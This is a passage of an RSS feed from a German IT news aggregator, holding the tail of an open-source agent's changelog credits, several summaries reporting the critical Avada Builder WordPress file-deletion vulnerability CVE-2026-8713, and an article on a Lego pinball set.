class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JimStenstrom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JimStenstrom">@JimStenstrom</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jmsunseri/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jmsunseri">@jmsunseri</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joel611/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joel611">@joel611</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoelJJohnson/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoelJJohnson">@JoelJJohnson</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joerj123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joerj123">@joerj123</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/johnjacobkenny/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/johnjacobkenny">@johnjacobkenny</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jooray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jooray">@jooray</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshuadow/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshuadow">@joshuadow</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jplew/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jplew">@jplew</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/justinbao19/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/justinbao19">@justinbao19</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Justlrnal4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Justlrnal4">@Justlrnal4</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kailigithub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kailigithub">@Kailigithub</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kamonspecial/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kamonspecial">@kamonspecial</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kdunn926/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kdunn926">@kdunn926</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kenmege/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kenmege">@Kenmege</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kewe63/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kewe63">@Kewe63</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kmccammon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kmccammon">@kmccammon</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/konsisumer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/konsisumer">@konsisumer</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kristianvast/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kristianvast">@kristianvast</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kyssta-exe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kyssta-exe">@kyssta-exe</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/l37525778-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/l37525778-coder">@l37525778-coder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LaPhilosophie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LaPhilosophie">@LaPhilosophie</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/leo4226/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/leo4226">@leo4226</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonSGP43/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonSGP43">@LeonSGP43</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liuhao1024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liuhao1024">@liuhao1024</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Llugaes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Llugaes">@Llugaes</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LoongZhao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LoongZhao">@LoongZhao</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lsaether/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lsaether">@lsaether</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/m4dni5/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/m4dni5">@m4dni5</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/manishbyatroy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/manishbyatroy">@manishbyatroy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MaxFreedomPollard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MaxFreedomPollard">@MaxFreedomPollard</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxmilian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxmilian">@maxmilian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxtrigify/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxtrigify">@maxtrigify</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mnajafian-nv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mnajafian-nv">@mnajafian-nv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mohamedorigami-jpg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mohamedorigami-jpg">@mohamedorigami-jpg</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mollusk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mollusk">@mollusk</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrDiamondBallz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrDiamondBallz">@MrDiamondBallz</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mssteuer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mssteuer">@mssteuer</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mvanhorn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mvanhorn">@mvanhorn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/naqerl/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/naqerl">@naqerl</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nea74/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nea74">@Nea74</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/necoweb3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/necoweb3">@necoweb3</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nepenth/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nepenth">@nepenth</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nicoloboschi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nicoloboschi">@nicoloboschi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NormallyGaussian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NormallyGaussian">@NormallyGaussian</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OmarB97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OmarB97">@OmarB97</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omegazheng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omegazheng">@omegazheng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OndrejDrapalik/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OndrejDrapalik">@OndrejDrapalik</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oxngon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oxngon">@oxngon</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OYLFLMH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OYLFLMH">@OYLFLMH</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paperclip/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paperclip">@paperclip</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paulb26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paulb26">@paulb26</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pengyuyanITYU/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pengyuyanITYU">@pengyuyanITYU</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PhilipAD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PhilipAD">@PhilipAD</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pinguarmy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pinguarmy">@pinguarmy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/plcunha/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/plcunha">@plcunha</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProgramCaiCai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProgramCaiCai">@ProgramCaiCai</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/psionic73/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/psionic73">@psionic73</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qin-ctx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qin-ctx">@qin-ctx</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qingshan89/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qingshan89">@qingshan89</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Que0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Que0x">@Que0x</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qWaitCrypto/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qWaitCrypto">@qWaitCrypto</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/r266-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/r266-tech">@r266-tech</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/randomsnowflake/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/randomsnowflake">@randomsnowflake</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rbrtbn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rbrtbn">@rbrtbn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rewbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rewbs">@rewbs</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rio-jeong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rio-jeong">@rio-jeong</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Rivuza/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Rivuza">@Rivuza</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rodboev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rodboev">@rodboev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ruangraung/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ruangraung">@ruangraung</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyTsYdUp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyTsYdUp">@RyTsYdUp</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sahil-SS9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sahil-SS9">@Sahil-SS9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/salesondemandio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/salesondemandio">@salesondemandio</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanidhyasin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanidhyasin">@sanidhyasin</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sarvesh1327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sarvesh1327">@sarvesh1327</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sdyckjq-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sdyckjq-lab">@sdyckjq-lab</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannonsands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannonsands">@shannonsands</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, @simpolism, @sitkarev, @skyc1e, @skylarbpayne, @SNooZyy2,<br>
@Spaceman-Spiffy, @srojk34, @sweetcornna, @synapsesx, @Tamaz-sujashvili, @tangtaizong666, @temalo, @tfournet,<br>
@thedavidweng, @TheGardenGallery, @tim404x, @tomekpanek, @Tranquil-Flow, @tt-a1i, @tuancookiez-hub,<br>
@underthestars-zhy, @Veritas-7, @victor-kyriazakos, @wesleysimplicio, @WolframRavenwolf, @WompaJango, @x1erra,<br>
@xiaoxinova, @xtymac, @xushibo, @XVVH, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxchan">@xxchan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxxigm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxxigm">@xxxigm</a>, @xy200303, @y0shua1ee, @yanxue06, @yatesjalex,<br>
@YLChen-007, @yoniebans, @youjunxiaji, @yubingz, @zakame, @zapabob, @zccyman, @zimigit2020, @ziwon, @zwcf5200,<br>
@zxcasongs.</p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.6.5...v2026.6.19">v2026.6.5...v2026.6.19</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical WordPress Plugin Vulnerability Exposes 1 Million Sites to File Deletion Attacks]]></title>
<description><![CDATA[A critical security vulnerability in the widely used Avada (Fusion) Builder WordPress plugin has exposed over 1 million websites to arbitrary file-deletion attacks, potentially leading to full-site compromise and remote code execution. The flaw, tracked as CVE-2026-8713 with a CVSS score of 9.1, ...]]></description>
<link>https://tsecurity.de/de/3610788/it-security-nachrichten/critical-wordpress-plugin-vulnerability-exposes-1-million-sites-to-file-deletion-attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610788/it-security-nachrichten/critical-wordpress-plugin-vulnerability-exposes-1-million-sites-to-file-deletion-attacks/</guid>
<pubDate>Fri, 19 Jun 2026 17:40:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical security vulnerability in the widely used Avada (Fusion) Builder WordPress plugin has exposed over 1 million websites to arbitrary file-deletion attacks, potentially leading to full-site compromise and remote code execution. The flaw, tracked as CVE-2026-8713 with a CVSS score of 9.1, was discovered by security researcher “daroo” and reported through the Wordfence Bug […]</p>
<p>The post <a href="https://cybersecuritynews.com/avada-wordpress-plugin-vulnerability/">Critical WordPress Plugin Vulnerability Exposes 1 Million Sites to File Deletion Attacks</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical WordPress Plugin Bug Could Allow File Deletion Attacks on 1 Million Sites]]></title>
<description><![CDATA[A serious security vulnerability has been uncovered in the widely used Avada (Fusion) Builder WordPress plugin. This flaw could enable unauthenticated attackers to delete arbitrary files and potentially compromise entire websites across more than one million installations. Identified as CVE-2026-...]]></description>
<link>https://tsecurity.de/de/3610538/it-security-nachrichten/critical-wordpress-plugin-bug-could-allow-file-deletion-attacks-on-1-million-sites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610538/it-security-nachrichten/critical-wordpress-plugin-bug-could-allow-file-deletion-attacks-on-1-million-sites/</guid>
<pubDate>Fri, 19 Jun 2026 15:36:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A serious security vulnerability has been uncovered in the widely used Avada (Fusion) Builder WordPress plugin. This flaw could enable unauthenticated attackers to delete arbitrary files and potentially compromise entire websites across more than one million installations. Identified as CVE-2026-8713…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/critical-wordpress-plugin-bug-could-allow-file-deletion-attacks-on-1-million-sites/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/critical-wordpress-plugin-bug-could-allow-file-deletion-attacks-on-1-million-sites/">Critical WordPress Plugin Bug Could Allow File Deletion Attacks on 1 Million Sites</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical WordPress Plugin Bug Could Allow File Deletion Attacks on 1 Million Sites]]></title>
<description><![CDATA[A serious security vulnerability has been uncovered in the widely used Avada (Fusion) Builder WordPress plugin. This flaw could enable unauthenticated attackers to delete arbitrary files and potentially compromise entire websites across more than one million installations. Identified as CVE-2026-...]]></description>
<link>https://tsecurity.de/de/3610494/it-security-nachrichten/critical-wordpress-plugin-bug-could-allow-file-deletion-attacks-on-1-million-sites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610494/it-security-nachrichten/critical-wordpress-plugin-bug-could-allow-file-deletion-attacks-on-1-million-sites/</guid>
<pubDate>Fri, 19 Jun 2026 15:24:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A serious security vulnerability has been uncovered in the widely used Avada (Fusion) Builder WordPress plugin. This flaw could enable unauthenticated attackers to delete arbitrary files and potentially compromise entire websites across more than one million installations. Identified as CVE-2026-8713 and assigned a CVSS score of 9.1, the vulnerability affects all plugin versions up to […]</p>
<p>The post <a href="https://gbhackers.com/critical-wordpress-plugin-bug/">Critical WordPress Plugin Bug Could Allow File Deletion Attacks on 1 Million Sites</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Flaw in WordPress Plugin Allows Arbitrary File Deletion on 1 Million Sites]]></title>
<description><![CDATA[A critical unauthenticated arbitrary file deletion vulnerability has been discovered in Avada Builder, a premium WordPress plugin with approximately 1 million active installations. Tracked as CVE-2026-8713 with a CVSS score of 9.1 (Critical), the flaw allows unauthenticated attackers to delete ar...]]></description>
<link>https://tsecurity.de/de/3610442/it-security-nachrichten/critical-flaw-in-wordpress-plugin-allows-arbitrary-file-deletion-on-1-million-sites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610442/it-security-nachrichten/critical-flaw-in-wordpress-plugin-allows-arbitrary-file-deletion-on-1-million-sites/</guid>
<pubDate>Fri, 19 Jun 2026 15:09:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical unauthenticated arbitrary file deletion vulnerability has been discovered in Avada Builder, a premium WordPress plugin with approximately 1 million active installations. Tracked as CVE-2026-8713 with a CVSS score of 9.1 (Critical), the flaw allows unauthenticated attackers to delete arbitrary files on the server, potentially enabling a full site takeover via remote code execution (RCE). The vulnerability, affecting Avada (Fusion) […]</p>
<p>The post <a href="https://cyberpress.org/critical-flaw-in-wordpress-plugin/">Critical Flaw in WordPress Plugin Allows Arbitrary File Deletion on 1 Million Sites</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Lego bringt voll funktionsfähigen Flipperautomaten]]></title>
<description><![CDATA[Lego hat einen Flipperautomat (auf Englisch: „Arcade Pinball Machine“) vorgestellt. Dabei handelt es sich um ein neues Set (Nummer: 11374) aus der „Icons“-Reihe, das zum ersten Mal ein Lego-Modell in einen funktionierenden Flipper verwandelt.



Das Modell besteht aus 2.274 Teilen und ist mit meh...]]></description>
<link>https://tsecurity.de/de/3609734/it-nachrichten/lego-bringt-voll-funktionsfaehigen-flipperautomaten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609734/it-nachrichten/lego-bringt-voll-funktionsfaehigen-flipperautomaten/</guid>
<pubDate>Fri, 19 Jun 2026 10:32:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Lego hat einen <a href="https://click.linksynergy.com/deeplink?id=wEwyDeNfvlM&amp;mid=50641&amp;murl=https://www.lego.com/de-de/product/arcade-pinball-machine-11374&amp;subid=rss">Flipperautomat</a> (auf Englisch: „Arcade Pinball Machine“) vorgestellt. Dabei handelt es sich um ein neues Set (Nummer: 11374) aus der „Icons“-Reihe, das zum ersten Mal ein Lego-Modell in einen <strong>funktionierenden</strong> Flipper verwandelt.</p>



<p>Das Modell besteht aus 2.274 Teilen und ist mit mehreren klassischen Flipperfunktionen ausgestattet, darunter ein federbetriebener Kugelauswurf, Flipper, rotierende Hindernisse und Rampen. Das Ziel besteht darin, die Kugel durch ein vom Weltraum inspiriertes Spielfeld zu lenken und durch das Treffen verschiedener Ziele Punkte zu sammeln.</p>



<p>Das Thema dreht sich um einen klassischen Lego-Astronauten, der versucht, ein vermisstes Weltraumbaby wiederzufinden. Im Lieferumfang sind zwei Minifiguren enthalten – ein Astronaut und die beliebte Figur „Space Baby“.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a34fe6e0722b"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/11374_Lifestyle_Build_07.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Arcade Pinball Machine" class="wp-image-3169015" width="1200" height="750" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Lego</p></div>



<p>Lego schreibt in bester Marketingsprache:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p>Das Set vereint Kreativität, Technik und Nostalgie und bietet ein einzigartiges interaktives Bauerlebnis. Das fertige Modell wurde für Erwachsene und Fans klassischer Spiele entwickelt und ist von alten Spielautomaten inspiriert. Es eignet sich zudem hervorragend als Ausstellungsstück für zu Hause, im Büro oder im Spielzimmer.</p>
</blockquote>



<p>Lego ergänzt: “Bastler können ihr Erlebnis mit der LEGO Builder-App bereichern, die intuitive 3D-Bauanleitungen bietet und es den Nutzern ermöglicht, während des gesamten Bauvorgangs zu zoomen, zu drehen und ihren Fortschritt zu verfolgen”.</p>



<h2 class="wp-block-heading">Voll funktionsfähig</h2>



<p>Ist das Modell fertiggestellt, dient es nicht nur als Ausstellungsstück, sondern auch als voll funktionsfähiger Flipper. Lego beschreibt das Set als eine Kombination aus kreativem Bauen, Mechanik und nostalgischem Arcade-Feeling.</p>



<p>Der fertige Flipper ist 24 Zentimeter hoch, 38 Zentimeter lang und 28 Zentimeter breit.</p>



<p>Der Flipperautomat alias „Lego Icons Arcade Pinball Machine“ erscheint am 1. Juli 2026 für Lego Insiders-Mitglieder und ist ab dem 4. Juli für alle erhältlich. Der Preis in Europa beträgt 209,99 Euro.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Critical Unauthenticated Arbitrary File Deletion Vulnerability Patched in Avada Builder WordPress Plugin]]></title>
